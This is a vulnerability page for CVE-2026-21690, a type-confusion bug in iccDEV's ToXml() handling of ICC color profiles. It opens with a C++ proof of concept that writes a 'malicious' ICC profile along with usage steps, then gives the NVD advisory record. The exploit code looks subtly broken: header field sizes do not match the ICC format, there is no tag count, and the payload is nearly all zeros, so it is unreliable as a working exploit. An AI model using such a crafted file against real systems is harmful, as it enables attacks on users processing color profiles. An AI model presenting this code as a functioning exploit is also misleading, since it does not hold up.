CVE-2026-21690

#include <iostream> #include <fstream> #include <cstring> // Simulated ICC Tag XML structure to trigger type confusion // This PoC demonstrates the concept of crafting malicious ICC profile data unsigned char malicious_icc_tag[] = { // ICC Profile Header (128 bytes) 0x00, 0x00, 0x0B, 0x61, // Profile size 0x61, 0x70, 0x70, 0x6C, // 'appl' preferred CMM 0x00, 0x00, 0x02, 0x00, // Profile version 0x00, 0x00, 0x00, 0x00, // Device class 0x00, 0x00, 0x00, 0x00, // Color space 0x00, 0x00, 0x00, 0x00, // PCS 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // Creation date 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // Profile file signature 0x00, 0x00, 0x00, 0x00, // Primary platform 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // Profile flags 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // Tag signature: 'desc' (description) 0x64, 0x65, 0x73, 0x63, // Offset to tag data 0x00, 0x00, 0x00, 0x8C, // Tag size 0x00, 0x00, 0x00, 0x3C, // Malicious tag data designed to trigger type confusion in ToXml() 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; void create_malicious_profile(const char* filename) { std::ofstream file(filename, std::ios::binary); if (file.is_open()) { file.write(reinterpret_cast<char*>(malicious_icc_tag), sizeof(malicious_icc_tag)); file.close(); std::cout << "Malicious ICC profile created: " << filename << std::endl; } } // Usage: // 1. Create malicious ICC profile using create_malicious_profile() // 2. Process the profile with vulnerable iccDEV library // 3. Trigger CIccTagXmlTagData::ToXml() to exploit type confusion int main() { create_malicious_profile("malicious_profile.icc"); return 0; }

{"cve": {"id": "CVE-2026-21690", "sourceIdentifier": "[email protected]", "published": "2026-01-07T22:15:45.383", "lastModified": "2026-01-12T18:26:22.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccTagXmlTagData::ToXml()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Las versiones anteriores a la 2.3.1.2 tienen una vulnerabilidad de confusión de tipos en 'CIccTagXmlTagData::ToXml()'. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La versión 2.3.1.2 contiene un parche. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-457"}, {"lang": "en", "value": "CWE-475"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/393", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/426", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-2f26-vh48-38g6", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}